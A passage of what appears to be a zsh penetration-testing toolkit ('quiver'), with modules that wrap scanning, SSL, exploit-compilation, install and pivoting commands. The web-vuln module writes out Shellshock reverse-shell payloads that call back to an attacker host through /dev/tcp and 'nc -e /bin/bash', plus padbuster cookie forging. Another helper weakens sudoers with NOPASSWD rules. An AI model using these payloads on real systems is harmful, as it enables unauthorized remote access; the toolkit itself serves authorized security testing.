-z \"tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 443 -w $(__hostpath)/ssl.pcap\"\n}\n\nqq-enum-web-ssl-der-to-crt() {\n __ask \"Select the cacert.der file\"\n local f && __askpath f FILE $(pwd)\n print -z \"sudo openssl x509 -inform DER -in ${f} -out cacert.crt\"\n}\n\nqq-enum-web-ssl-crt-ca-install() {\n __ask \"Select the cacert.crt file\"\n local f && __askpath f FILE $(pwd)\n print -z \"sudo cp ${f} /usr/local/share/ca-certificates/. && sudo update-ca-certificates\"\n}\n\nqq-enum-web-ssl-certs() {\n qq-vars-set-url\n print -z \"openssl s_client -showcerts -connect ${__URL}:443\" \n}\n\nqq-enum-web-ssl-cert-download() {\n __check-project\n qq-vars-set-url\n\tlocal d=$(echo \"${__URL}\" | cut -d/ -f3)\n\tprint -z \"openssl s_client -servername ${d} -connect ${d}:443 $(__urlpath)/ssl.certificate.`date +\"%Y%m%d-%H%M%S\"`.pem\"\n}\n\nqq-enum-web-ssl-testssl-full() {\n __check-project\n qq-vars-set-url\n\tprint -z \"testssl --color=3 -oA $(__urlpath)/testssl.full.`date +\"%Y%m%d-%H%M%S\"` ${__URL} \"\n}\n\nqq-enum-web-ssl-testssl-ciphers() {\n __check-project\n qq-vars-set-url\n\tprint -z \"testssl -E --color=3 -oA $(__urlpath)/testssl.ciphers.`date +\"%Y%m%d-%H%M%S\"` ${__URL} \"\n}\n" }, { "path": "modules/qq-enum-web-vuln.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-vuln\n#############################################################\n\nqq-enum-web-vuln-help() {\n cat << \"DOC\"\n\nqq-enum-web-vuln\n----------------\nThe enum-web-vuln namespace contains commands for discovering web vulnerabilities.\n\nCommands\n--------\nqq-enum-web-vuln-install: installs dependencies\nqq-enum-web-vuln-nikto: scan a target for web vulnerabilities \nqq-enum-web-vuln-nmap-rfi: scan for potential rfi uri's\nqq-enum-web-vuln-shellshock-agent: create a shellshock payload for user-agent\nqq-enum-web-vuln-shellshock-nc: attempt shellshock with a reverse shell payload\nqq-enum-web-vuln-put-curl: attempt to PUT a file with curl\nqq-enum-web-vuln-padbuster-check: test for padbuster\nqq-enum-web-vuln-padbuster-forge: exploit with padbuster\n\nDOC\n}\n\nqq-enum-web-vuln-install() {\n __info \"Running $0...\"\n __pkgs nikto curl nmap padbuster\n}\n\nqq-enum-web-vuln-nikto() {\n __check-project\n qq-vars-set-url\n print -z \"nikto -useragent \\\"${__UA}\\\" -h \\\"${__URL}\\\" -o $(__urlpath)/nikto.txt\"\n}\n\nqq-enum-web-vuln-nmap-rfi() {\n qq-vars-set-rhost\n print -z \"nmap -vv -n -Pn -p80 --script http-rfi-spider --script-args http-rfi-spider.url='/' ${__RHOST}\"\n}\n\nqq-enum-web-vuln-shellshock-agent() {\n qq-vars-set-lhost\n qq-vars-set-lport\n __ok \"Copy the header value below to use in your exploit\"\n cat << DOC\n\nUser-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/${__LHOST}/${__LPORT} 0>&1\n\nDOC\n}\n\nqq-enum-web-vuln-shellshock-nc() {\n qq-vars-set-lhost\n qq-vars-set-lport\n qq-vars-set-rhost\n __warn \"Start a netcat listener for ${__LHOST}:${__LPORT}\"\n print -z \"curl -A '() { :; }; /bin/bash -c \\\"/usr/bin/nc ${__LHOST} ${__LPORT} -e /bin/bash\\\"' \\\"http://${__RHOST}/cgi-bin/status\\\"\"\n}\n\nqq-enum-web-vuln-put-curl() {\n qq-vars-set-rhost\n local f && __askpath f FILE $(pwd)\n print -z \"curl -L -T ${f} \\\"http://${__RHOST}/${f}\\\" \"\n}\n\nqq-enum-web-vuln-padbuster-check() {\n qq-vars-set-rhost\n local cn && __askvar cn \"COOKIE NAME\"\n local cv && __askvar cv \"COOKIE VALUE\"\n print -z \"padbuster ${__RHOST} ${cv} 8 -cookies ${cn}=${cv} -encoding 0\"\n}\n\nqq-enum-web-vuln-padbuster-forge() {\n qq-vars-set-rhost\n local cn && __askvar cn \"COOKIE NAME\"\n local cv && __askvar cv \"COOKIE VALUE\"\n __check-user\n print -z \"padbuster ${__RHOST} ${cv} 8 -cookies ${cn}=${cv} -encoding 0 -plaintext user=${__USER}\"\n}" }, { "path": "modules/qq-enum-web.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web\n#############################################################\n\nqq-enum-web-help() {\n cat << \"DOC\"\n\nqq-enum-web\n-----------\nThe qq-enum-web namespace contains commands for scanning and enumerating\nhttp services.\n\nCommands\n--------\nqq-enum-web-install: installs dependencies\nqq-enum-web-tcpdump: capture traffic to and from a host\nqq-enum-web-nmap-sweep: nmap sweep scan to discover web servers on a network\nqq-enum-web-whatweb: enumerate web server and platform information\nqq-enum-web-waf: enumerate WAF information\nqq-enum-web-vhosts-gobuster: brute force for virtual hosts\nqq-enum-web-eyewitness: scrape screenshots from target URL\nqq-enum-web-wordpress: enumerate Wordpress information\nqq-enum-web-headers: grab headers from a target url using curl\nqq-enum-web-mirror: mirrors the target website locally\n\nDOC\n}\n\nqq-enum-web-install() {\n __info \"Running $0...\"\n __pkgs tcpdump nmap whatweb wafw00f gobuster eyewitness wpscan wget curl seclists wordlists \n go get -u github.com/jaeles-project/gospider\n go get -u github.com/hakluke/hakrawler\n}\n\nqq-enum-web-nmap-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"sudo nmap -n -Pn -sS -p80,443,8080 ${__NETWORK} -oA $(__netpath)/web-sweep\"\n}\n\nqq-enum-web-tcpdump() {\n __check-project\n qq-vars-set-iface\n qq-vars-set-rhost\n print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 80 -w $(__hostpath)/web.pcap\"\n}\n\nqq-enum-web-whatweb() {\n __check-project\n qq-vars-set-url\n print -z \"whatweb ${__URL} -a 3 | tee $(__urlpath)/whatweb.txt\"\n}\n\nqq-enum-web-waf() {\n __check-project\n qq-vars-set-url\n print -z \"wafw00f ${__URL} -o $(__urlpath)/waf.txt\"\n}\n\n# vhosts\n\nqq-enum-web-vhosts-gobuster() {\n __check-project\n qq-vars-set-url\n local w && __askpath w FILE /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt\n __check-threads\n print -z \"gobuster vhost -u ${__URL} -w ${w} -a \\\"${__UA}\\\" -t ${__THREADS} -o $(__urlpath)/vhosts.txt\"\n}\n\n# screens\n\nqq-enum-web-eyewitness() {\n __check-project\n qq-vars-set-url\n mkdir -p $(__urlpath)/screens\n print -z \"eyewitness --web --no-dns --no-prompt --single ${__URL} -d $(__urlpath)/screens --user-agent \\\"${__UA}\\\" \"\n}\n\n# apps\n\nqq-enum-web-wordpress() {\n __check-project\n qq-vars-set-url\n print -z \"wpscan --ua \\\"${__UA}\\\" --url ${__URL} --enumerate tt,vt,u,vp -o $(__urlpath)/wpscan.txt\"\n}\n\nqq-enum-web-headers() {\n __check-project\n qq-vars-set-url\n print -z \"curl -s -X GET -I -L -A \\\"${__UA}\\\" \\\"${__URL}\\\" | tee $(__urlpath)/headers.txt\"\n}\n\nqq-enum-web-mirror() {\n __warn \"The destination site will be mirrored in the current directory\"\n qq-vars-set-url\n print -z \"wget -mkEpnp ${__URL} \"\n}\n\nqq-enum-web-gospider() {\n __check-project\n qq-vars-set-url\n print -z \"gospider -s \"${__URL}\" -o $(__urlpath)/spider.txt\"\n}\n\nqq-enum-web-hakrawler() {\n __check-project\n qq-vars-set-url\n local d && __askvar d DEPTH\n print -z \"hakrawler -url \"${__URL}\" -depth ${d} -linkfinder -usewayback | tee $(__urlpath)/hakrawler.txt\"\n}\n" }, { "path": "modules/qq-exploit.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-exploit\n#############################################################\n\nqq-exploit-help() {\n cat << \"DOC\"\n\nqq-exploit\n----------\nThe exploit namespace provides commands that assist with compilation and\ncross-compilation commands for exploits.\n\nCommands\n--------\nqq-exploit-install: installs dependencies\nqq-exploit-searchsploit-nmap: use searchsploit with an nmap xml results file\nqq-exploit-compile-gcc: compile a linux exploit\nqq-exploit-compile-gcc-32: compile a linux 32 exploit on 64\nqq-exploit-compile-c-win32: cross compile a C win32 exploit\nqq-exploit-compile-c-win64: cross compile a C wind64 exploit\nqq-exploit-compile-c++-win32: cross compile a C++ win32 exploit\nqq-exploit-compile-c++-win64: cross compile a C++ win64 exploit\n\nDOC\n}\n\nqq-exploit-install() {\n __info \"Running $0...\"\n sudo dpkg --add-architecture i386\n sudo apt-get update\n __pkgs exploitdb\n __pkgs mingw-w64 gcc gcc-multilib g++-multilib\n}\n\nqq-exploit-searchsploit-nmap() {\n __check-project\n __ask \"Select nmap xml scan results file\"\n local f && __askpath f FILE ${__PROJECT}\n print -z \"searchsploit -x --nmap ${f}\"\n}\n\nqq-exploit-compile-gcc() {\n __check-project\n mkdir -p ${__PROJECT}/exploits\n local src && __askpath src SOURCE ${__PROJECT}/exploits\n local out && __askpath out OUTPUT ${__PROJECT}/exploits\n print -z \"gcc -o ${out} ${src}\"\n}\n\nqq-exploit-compile-gcc-32() {\n __check-project\n mkdir -p ${__PROJECT}/exploits\n local src && __askpath src SOURCE ${__PROJECT}/exploits\n local out && __askpath out OUTPUT ${__PROJECT}/exploits\n print -z \"gcc -m32 -o ${out} ${src}\"\n}\n\nqq-exploit-compile-c-win32() {\n __check-project\n mkdir -p ${__PROJECT}/exploits\n local src && __askpath src SOURCE ${__PROJECT}/exploits\n local out && __askpath out OUTPUT ${__PROJECT}/exploits\n print -z \"i686-w64-mingw32-gcc ${src} -o ${out}\"\n}\n\nqq-exploit-compile-c-win64() {\n __check-project\n mkdir -p ${__PROJECT}/exploits\n local src && __askpath src SOURCE ${__PROJECT}/exploits\n local out && __askpath out OUTPUT ${__PROJECT}/exploits\n print -z \"x86_64-w64-mingw32-gcc ${src} -o ${out}\"\n}\n\nqq-exploit-compile-c++-win32() {\n __check-project\n mkdir -p ${__PROJECT}/exploits\n local src && __askpath src SOURCE ${__PROJECT}/exploits\n local out && __askpath out OUTPUT ${__PROJECT}/exploits\n print -z \"i686-w64-mingw32-g++ ${src} -o ${out}\"\n}\n\nqq-exploit-compile-c++-win64() {\n __check-project\n mkdir -p ${__PROJECT}/exploits\n local src && __askpath src SOURCE ${__PROJECT}/exploits\n local out && __askpath out OUTPUT ${__PROJECT}/exploits\n print -z \"x86_64-w64-mingw32-g++ ${src} -o ${out}\"\n}\n\nqq-exploit-compile-notes-winsock() {\n __info \"use -lws2_32\"\n}\n\nqq-exploit-compile-notes-static() {\n __info \"-static-libstdc++\"\n __info \"-static-libgcc\"\n}\n" }, { "path": "modules/qq-install.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-install\n#############################################################\n\nqq-install-help() {\n cat << \"DOC\"\n\nqq-install\n----------\nThe qq-install namespace provides commands that assist with installing\npackages, repos and tools used in quiver.\n\nCommands\n--------\nqq-install-all: Installs all dependecies in all modules, calling qq-*-install \nqq-install-git-pull-tools: Updates all install tools that are git repos\nqq-install-dev: Installs pyhton3, php, npm and libraries\nqq-install-essentials: Installs useful utilities\nqq-install-golang: Installs golang and environment variables needed for \"go get\"\n\nTools\n-----\nThese installers are for individual tools.\n\nqq-install-wordlist-commonspeak\nqq-install-wordlist-nerdlist\nqq-install-massdns\nqq-install-github-search\nqq-install-s3scanner\nqq-install-git-secrets\nqq-install-gitrob\nqq-install-pentest-tools\nqq-install-protonvpn\nqq-install-nmap-elasticsearch-nse\nqq-install-link-finder\nqq-install-bat\n\nDOC\n}\n\n##### Helpers\n\n__addpath() {\n echo \"export PATH=\\$PATH:$1\" | tee -a ~/.zshrc\n export PATH=$PATH:$1\n}\n\n__pkgs(){\n __info \"checking for and installing dependencies...\"\n for pkg in \"$@\"\n do\n __info \"$pkg\"\n dpkg -l | grep -qw $pkg && __warn \"already installed\" || sudo apt-get -y install $pkg\n done \n}\n\nqq-install-all() {\n __cyan \"This will install/update all modules.\"\n __cyan \"Ensure you have free disk space before proceeding.\"\n __ask \"CONTINUE?\"\n if __check-proceed\n then\n __info \"Installing all modules...\"\n #qq-encoding-install\n qq-enum-dhcp-install\n qq-enum-dns-install\n qq-enum-ftp-install\n qq-enum-host-install\n qq-enum-kerb-install\n qq-enum-ldap-install\n qq-enum-mssql-install\n qq-enum-mysql-install\n qq-enum-network-install\n qq-enum-nfs-install\n qq-enum-oracle-install\n qq-enum-pop3-install\n qq-enum-rdp-install\n qq-enum-smb-install\n qq-enum-web-aws-install\n qq-enum-web-dirs-install\n qq-enum-web-elastic-install\n qq-enum-web-fuzz-install\n qq-enum-web-js-install\n qq-enum-web-vuln-install\n qq-enum-web-php-install\n qq-enum-web-ssl-install\n qq-enum-web-install\n qq-exploit-install\n #qq-kali-install\n qq-notes-install\n qq-log-install\n qq-pivot-install\n qq-project-install\n qq-recon-domains-install\n qq-recon-github-install\n qq-recon-networks-install\n qq-recon-org-install\n qq-recon-subs-install\n qq-shell-handlers-msf-install\n qq-shell-handlers-install\n #qq-shell-tty-install\n qq-srv-install\n __info \"Install finished\"\n fi\n}\n\nqq-install-git-pull-tools() {\n __cyan \"This will git-pull all repos in ${__TOOLS}.\"\n __ask \"CONTINUE?\"\n if __check-proceed\n then\n cd ${__TOOLS}\n for d in $(ls -d */)\n do \n cd $d\n __ok \"Pulling ${d}\"\n git pull \n cd -\n done\n cd ${__TOOLS}\n fi\n}\n\nqq-install-dev(){\n __cyan \"This will python3, php, npm and libraries.\"\n __ask \"CONTINUE?\"\n if __check-proceed\n then\n __pkgs python3 python3-pip php php-curl libldns-dev libssl-dev libcurl4-openssl-dev npm\n fi\n}\n\nqq-install-essentials(){\n __cyan \"This common utilities such as jq, tmux, tree, dtach and more.\"\n __ask \"CONTINUE?\"\n if __check-proceed\n then\n __pkgs jq pigz fonts-powerline unzip tmux dtach tree\n fi\n}\n\n##### Individual Tools\n\nqq-install-golang() {\n __pkgs golang\n\n if [[ -z \"$(echo $GOPATH)\" ]]\n then\n echo \"export GOPATH=\\$HOME/go\" | tee -a $HOME/.zshrc\n echo \"export PATH=\\$PATH:/usr/local/go/bin:\\$GOPATH/bin\" | tee -a $HOME/.zshrc\n export GOPATH=$HOME/go\n export PATH=$PATH:/usr/local/go/bin:$HOME/go/bin\n fi \n}\n\nqq-install-node() {\n __pkgs nodejs npm\n\n cd $HOME\n mkdir -p $HOME/.npm-global\n npm config set prefix '~/.npm-global'\n\n if ! $(echo $PATH | grep -q \"npm-global\")\n then\n echo \"export PATH=\\$PATH:\\$HOME/.npm-global\" | tee -a $HOME/.zshrc\n export PATH=$PATH:$HOME/.npm-global\n fi\n}\n\nqq-install-wordlist-commonspeak() {\n local name=\"commonspeak2\"\n local url=\"https://github.com/assetnote/commonspeak2-wordlists.git\"\n local p=\"$__TOOLS/$name\"\n\n __info \"$name\"\n\n if [[ ! -d $p ]]\n then\n git clone $url $p\n else\n __warn \"already installed in $p\"\n pushd $p \n git pull\n popd\n fi\n}\n\nqq-install-wordlist-nerdlist() {\n local name=\"nerdlist\"\n local url=\"https://github.com/tarahmarie/nerdlist.git\"\n local p=\"$__TOOLS/$name\"\n\n __info \"$name\"\n\n if [[ ! -d $p ]]\n then\n git clone $url $p\n else\n __warn \"already installed in $p\"\n pushd $p \n git pull\n popd\n fi\n}\n\nqq-install-massdns() {\n local name=\"massdns\"\n local url=\"https://github.com/blechschmidt/massdns.git\"\n local p=\"$__TOOLS/$name\"\n\n __info \"$name\"\n\n if [[ ! -d $p ]]\n then\n git clone $url $p\n\n #after commands\n pushd $p\n make\n popd\n __addpath $p/bin\n else\n __warn \"already installed in $p\"\n pushd $p \n git pull\n make\n popd\n fi\n}\n\nqq-install-github-search() {\n local name=\"github-search\"\n local url=\"https://github.com/gwen001/github-search.git\"\n local p=\"$__TOOLS/$name\"\n\n __info \"$name\"\n\n if [[ ! -d $p ]]\n then\n git clone $url $p\n\n #after commands\n pushd $p\n pip3 install -r requirements.txt\n popd\n __addpath $p\n else\n __warn \"already installed in $p\"\n pushd $p \n git pull\n pip3 install -r requirements.txt\n popd\n fi\n}\n\nqq-install-s3scanner() {\n local name=\"S3Scanner\"\n local url=\"https://github.com/sa7mon/S3Scanner.git\"\n local p=\"$__TOOLS/$name\"\n\n __info \"$name\"\n\n if [[ ! -d $p ]]\n then\n git clone $url $p\n\n #after commands\n pushd $p\n pip3 install -r requirements.txt\n popd\n __addpath $p\n else\n __warn \"already installed in $p\"\n pushd $p \n git pull\n pip3 install -r requirements.txt\n popd\n fi\n}\n\nqq-install-gf() {\n local name=\"gf\"\n\n __info \"$name\"\n\n go get -u github.com/tomnomnom/gf\n echo \"source \\$GOPATH/src/github.com/tomnomnom/gf/gf-completion.zsh\" >> $HOME/.zshrc\n cp -r $GOPATH/src/github.com/tomnomnom/gf/examples $HOME/.gf\n\n}\n\nqq-install-git-secrets() {\n local name=\"git-secrets\"\n local url=\"https://github.com/awslabs/git-secrets.git\"\n local p=\"$__TOOLS/$name\"\n\n __info \"$name\"\n\n if [[ ! -d $p ]]\n then \n git clone $url $p\n\n #after commands\n pushd $p\n sudo make install\n popd\n __addpath $p\n\n else\n __warn \"already installed in $p\"\n pushd $p \n git pull\n sudo make install\n popd\n fi\n}\n\nqq-install-gitrob() {\n\n local name=\"gitrob\"\n\n __info \"$name\"\n\n go get -u github.com/golang/dep/cmd/dep\n go get -u github.com/codeEmitter/gitrob\n pushd ~/go/src/github.com/codeEmitter/gitrob\n dep ensure\n go build\n popd\n\n}\n\nqq-install-pentest-tools() {\n local name=\"pentest-tools\"\n local url=\"https://github.com/gwen001/pentest-tools.git\"\n local p=\"$__TOOLS/$name\"\n\n __info \"$name\"\n\n if [[ ! -d $p ]]\n then\n git clone $url $p\n\n #after commands\n __addpath $p\n\n else\n __warn \"already installed in $p\"\n pushd $p \n git pull\n popd\n fi\n}\n\nqq-install-protonvpn() {\n local name=\"protonvpn\"\n __info \"$name\"\n\n sudo apt install -y openvpn dialog python3-pip python3-setuptools\n sudo pip3 install protonvpn-cli\n __warn \"ProtonVPN username and password required\"\n print -z \"sudo protonvpn init\"\n}\n\nqq-install-nmap-elasticsearch-nse() {\n local name=\"nmap-elasticsearch-nse\"\n local url=\"https://github.com/theMiddleBlue/nmap-elasticsearch-nse.git\"\n local p=\"$__TOOLS/$name\"\n\n __info \"$name\"\n\n if [[ ! -d $p ]]\n then\n git clone $url $p\n\n #after commands\n pushd $p\n sudo cp elasticsearch.nse /usr/share/nmap/scripts/\n popd\n\n else\n __warn \"already installed in $p\"\n pushd $p \n git pull\n sudo cp elasticsearch.nse /usr/share/nmap/scripts/\n popd\n fi\n}\n\nqq-install-link-finder() {\n local name=\"LinkFinder\"\n local url=\"https://github.com/GerbenJavado/LinkFinder.git\"\n local p=\"$__TOOLS/$name\"\n\n __info \"$name\"\n\n if [[ ! -d $p ]]\n then\n git clone $url $p\n\n #after commands\n pushd $p \n sudo python3 setup.py install\n pip3 install -r requirements.txt \n popd\n\n else\n __warn \"already installed in $p\"\n pushd $p \n git pull\n python3 setup.py install\n pip3 install -r requirements.txt \n popd\n fi\n}\n\nqq-install-bat() {\n local name=\"bat\"\n __info \"$name\"\n\n cd $HOME\n wget https://github.com/sharkdp/bat/releases/download/v0.15.0/bat_0.15.0_amd64.deb \n sudo dpkg -i bat_0.15.0_amd64.deb\n rm bat_0.15.0_amd64.deb\n cd -\n}\n\n" }, { "path": "modules/qq-kali.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-kali\n#############################################################\n\nqq-kali-help() {\n cat << \"DOC\"\n\nqq-kali\n----------\nThe qq-kali namespace provides commands that assist with managing Kali linux.\n\nCommands\n--------\nqq-kali-pkg-upgrade: update and full-upgrade with autoremove\nqq-kali-pkg-query: query if a package is installed or not \nqq-kali-pkg-fix: fix broken packages\nqq-kali-pkg-go-update: update go modules and packages with go get\nqq-kali-fs-mounted: show mounted file systems\nqq-kali-fs-usage: show file system usage totals\nqq-kali-fs-last3: show files modified in last 3 days in /etc\nqq-kali-fs-large: show files larger than 1GB in the root fs\nqq-kali-mem-top10: show top10 processes by memory usage\nqq-kali-mem-free: show overall memory usage\nqq-kali-disk-top10: show top 10 files by size in current directory\nqq-kali-ps-tree: show a process tree\nqq-kali-ps-grep: search list of processes\nqq-kali-ps-dtach: run a script in the background\nqq-kali-net-watch: display network active connections\nqq-kali-net-open4: display open network connections ipv4\nqq-kali-net-open6: display open network connections ipv6\nqq-kali-net-routes: display the system routing table\nqq-kali-net-ss: display open network connections\nqq-kali-net-lsof: display open network connections\nqq-kali-net-pubip: query for the public IP\nqq-kali-pvpn-update: install or update proton vpn cli\nqq-kali-pvpn-status: check proton vpn status\nqq-kali-pvpn-connect-tcp: connect to proton vpn using tcp\nqq-kali-pvpn-connect-udp: connect to proton vpn using udp\nqq-kali-pvpn-disconnect: disconnect proton vpn\nqq-kali-path-add: add a new path to the PATH environment variable\nqq-kali-file-replace: replace an existing value in a file\nqq-kali-file-dos-to-unix: convert file with dos endings to unix\nqq-kali-file-unix-to-dos: convert file with unix endings to dos\nqq-kali-file-sort-uniq: sort a file uniq in place \nqq-kali-file-sort-uniq-ip: sort a file of IP addresses uniq in place\nqq-kali-sudoers-easy: removes the requirment for sudo for common commands like nmap\nqq-kali-sudoers-harden: removes sudo exclusions\n\nDOC\n}\n\nqq-kali-pkg-upgrade() { print -z \"sudo apt-get update && sudo apt-get full-upgrade && sudo apt-get autoremove\" }\n\nqq-kali-pkg-query() {\n local query && __askvar query PACKAGE \n for pkg in \"${query}\"\n do\n dpkg -l | grep -qw $pkg && __ok \"${pkg} is installed\" || __warn \"${pkg} not installed\"\n done \n}\n\nqq-kali-pkg-fix() { print -z \"sudo apt-get install --fix-broken && sudo apt-get autoremove && sudo apt-get update\" }\n\nqq-kali-pkg-go-update() { print -z \"go get -u all\" }\n\nqq-kali-fs-mounted() { print -z \"sudo mount | column -t\" }\n\nqq-kali-fs-usage() { print -z \"df -mTh --total\" }\n\nqq-kali-fs-last3() { print -z \"sudo find /etc -mtime -3\" }\n\nqq-kali-fs-large() { print -z \"sudo find / -type f -size +1G\" }\n\nqq-kali-mem-top10() { print -z \"sudo ps aux | sort -rk 4,4 | head -n 10 | awk '{print \\$4,\\$11}' \" }\n\nqq-kali-mem-free() { print -z \"free -th\" }\n\nqq-kali-disk-top10() { print -z \"sudo du -sk ./* | sort -r -n | head -10\" }\n\nqq-kali-ps-tree() { print -z \"ps auxf\" }\n\nqq-kali-ps-grep() { \n local query && __askvar query QUERY \n print -z \"ps aux | grep -v grep | grep -i -e VSZ -e ${query}\" \n}\n\nqq-kali-ps-dtach() { \n __ask \"Enter full path to script to run dtach'd\"\n local p && __askpath p PATH $(pwd)\n dtach -A ${p} /bin/zsh \n}\n\nqq-kali-net-watch() { print -z \"sudo watch -n 0.3 'netstat -pantlu4 | grep \\\"ESTABLISHED\\|LISTEN\\\"' \" }\n\nqq-kali-net-open4() { print -z \"sudo netstat -pantlu4\"}\n\nqq-kali-net-open6() { print -z \"sudo netstat -pantlu6\"}\n\nqq-kali-net-routes() { print -z \"netstat -r --numeric-hosts\" }\n\nqq-kali-net-ss() { print -z \"sudo ss -plaunt4\" }\n\nqq-kali-net-lsof() { print -z \"sudo lsof -P -i -n \"}\n\nqq-kali-net-pubip() { print -z \"curl -s \\\"https://icanhazip.com\\\" \"}\n\nqq-kali-pvpn-update() { print -z \"sudo pip3 install protonvpn-cli --upgrade\" }\n\nqq-kali-pvpn-status() { print -z \"sudo protonvpn status\" }\n\nqq-kali-pvpn-connect-tcp() { print -z \"sudo protonvpn c -f\" }\n\nqq-kali-pvpn-connect-udp() { print -z \"sudo protonvpn c -f -p udp\" }\n\nqq-kali-pvpn-disconnect() { print -z \"sudo protonvpn disconnect\" }\n\nqq-kali-path-add() { \n __ask \"Enter new path to append to current PATH\"\n local p && __askpath p PATH / \n print -z \"echo \\\"export PATH=\\$PATH:${p}\\\" | tee -a $HOME/.zshrc\" \n}\n\nqq-kali-file-replace() {\n local replace && __askvar replace REPLACE\n local with && __askvar with WITH\n local file && __askpath file FILE $(pwd)\n print -z \"sed 's/${replace}/${with}/g' ${file} > ${file}\"\n} \n\nqq-kali-file-dos-to-unix() { \n local file=$1 \n [[ -z \"${file}\" ]] && __askpath file FILE $(pwd)\n print -z \"tr -d \\\"\\015\\\" < ${file} > ${file}.unix\"\n}\n\nqq-kali-file-unix-to-dos() {\n local file=$1 \n [[ -z \"${file}\" ]] && __askpath file FILE $(pwd)\n print -z \"sed -e 's/$/\\r/' ${file} > ${file}.dos\"\n}\n\nqq-kali-file-sort-uniq() {\n local file=$1 \n [[ -z \"${file}\" ]] && __askpath file FILE $(pwd)\n print -z \"cat ${file} | sort -u -o ${file}\"\n}\n\nqq-kali-file-sort-uniq-ip() { \n local file=$1 \n [[ -z \"${file}\" ]] && __askpath file FILE $(pwd)\n print -z \"cat ${file} | sort -u | sort -V -o ${file}\"\n}\n\nqq-kali-sudoers-easy() {\n __warn \"This is dangerous for OPSEC! Remove when done.\"\n print -z \"echo \\\"$USER ALL=(ALL:ALL) NOPASSWD: /usr/bin/nmap, /usr/bin/masscan, /usr/sbin/tcpdump\\\" | sudo tee /etc/sudoers.d/$(whoami)\"\n}\nalias easymode=\"qq-bounty-sudoers-easy\"\n\nqq-kali-sudoers-harden() {\n print -z \"sudo rm /etc/sudoers.d/$(whoami)\"\n}\nalias hardmode=\"qq-bounty-sudoers-harden\"\n" }, { "path": "modules/qq-log.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-log\n#############################################################\n\nqq-log-help() {\n cat << \"DOC\"\n\nqq-log\n-------------\nThe log namespace provides commands that create a logbook in\na directory specified by the __LOGBOOK variable. Use qq-log to append entries\nto the logbook. Display the log with qq-log-cat. Edit the log\nwith qq-log-edit.\n\nCommands\n--------\nqq-log-install: installs dependencies\nqq-log: alias ql, appends $@ to an entry in the logbook\nqq-log-cat: alias qlc, cats the logbook\nqq-log-edit: alias qle, edits the logbook using $EDITOR\nqq-log-set: creates or uses existing logbook.md in the path specified\n\nDOC\n}\n\nqq-log-install() {\n __info \"Running $0...\"\n qq-install-golang\n go get -u github.com/charmbracelet/glow\n}\n\nqq-log-set() {\n qq-vars-set-logbook\n}\nalias qls=\"qq-log-set\"\n\nqq-log-cat() {\n __check-logbook\n __info \"${__LOGBOOK}\"\n glow ${__LOGBOOK}\n}\nalias qlc=\"qq-log-cat\"\n\nqq-log-edit() {\n __check-logbook\n $EDITOR ${__LOGBOOK}\n}\nalias qle=\"qq-log-edit\"\n\nqq-log() {\n __check-logbook\n\n local stamp=$(date +'%m-%d-%Y : %r')\n echo \"## ${stamp}\" >> ${__LOGBOOK}\n echo \"\\`\\`\\`\" >> ${__LOGBOOK}\n echo \"$@\" >> ${__LOGBOOK}\n echo \"\\`\\`\\`\" >> ${__LOGBOOK}\n echo \" \" >> ${__LOGBOOK}\n\n}\nalias ql=\"qq-log\"" }, { "path": "modules/qq-notes.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-notes\n#############################################################\n\nqq-notes-help() {\n cat << \"DOC\"\n\nqq-notes\n-------\nThe notes namespace provides searching and reading of markdown notes that are\nstored in a directory specified by the __NOTES environment variable (qq-vars-global).\n\nCommands\n--------\nqq-notes-install: installs dependencies\nqq-notes: lists all notes in $__NOTES or searches notes by filename if $1 is supplied\nqq-notes-content: list all notes in $__NOTES or searches notes by content if $1 is supplied\nqq-notes-menu: display an interactive menu for reading notes\n\nDOC\n}\n\nqq-notes-install() {\n __info \"Running $0...\"\n __pkgs fzf ripgrep\n qq-install-golang\n go get -u github.com/charmbracelet/glow\n qq-install-bat\n}\n\nqq-notes() {\n __notes-check\n __info \"Use \\$1 to search file names\"\n select note in $(ls -R --file-type ${__NOTES} | grep -ie \".md$\" | grep -i \"$1\")\n do test -n ${note} && break\n exit\n done\n [[ ! -z ${note} ]] && glow ${__NOTES}/${note}\n}\n\nqq-notes-content() {\n __notes-check\n __info \"Use \\$1 to search content\"\n select note in $(grep -rliw \"$1\" ${__NOTES}/*.md)\n do test -n ${note} && break\n exit\n done\n [[ ! -z ${note} ]] && glow ${note}\n}\n\nqq-notes-menu() {\n __notes-check\n pushd ${__NOTES} &> /dev/null\n rg --no-heading --no-line-number --with-filename --color=always --sort path -m1 \"\" *.md | fzf --tac --no-sort -d ':' --ansi --preview-window wrap --preview 'bat --style=plain --color=always ${1}'\n popd &> /dev/null\n}\n" }, { "path": "modules/qq-pivot.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-pivot\n#############################################################\n\nqq-pivot-help() {\n cat << \"DOC\"\n\nqq-pivot\n------------\nThe pivot namespace provides commands for using ssh to proxy and pivot.\n\nCommands\n--------\nqq-pivot-install: installs dependencies\nqq-pivot-mount-remote-sshfs: mounts a remote directory to local /mnt path using sshfs\nqq-pivot-ssh-dynamic-proxy: uses remote as a dynamic proxy\nqq-pivot-ssh-remote-to-local: forwards remote port to local port\nqq-pivot-ssh-remote-to-local-burp: forwards remote port 8080 to local port 8080\n\nDOC\n}\n\nqq-pivot-install() {\n __info \"Running $0...\"\n __pkgs sshfs rsync\n}\n\nqq-pivot-mount-remote-sshfs() { \n __check-user\n local lm && __askpath lm LMOUNT /mnt\n local rm && __askvar rm RMOUNT /\n qq-vars-set-rhost\n mkdir -p ${lm}\n print -z \"sshfs ${__USER}@${__RHOST}:${rm} ${lm}\" \n}\n\nqq-pivot-ssh-dynamic-proxy() {\n __check-user\n qq-vars-set-rhost\n qq-vars-set-lport\n print -z \"ssh -D ${__LPORT} -CqN ${__USER}@${__RHOST}\" \n}\n\nqq-pivot-ssh-remote-to-local() {\n __check-user\n qq-vars-set-rhost\n 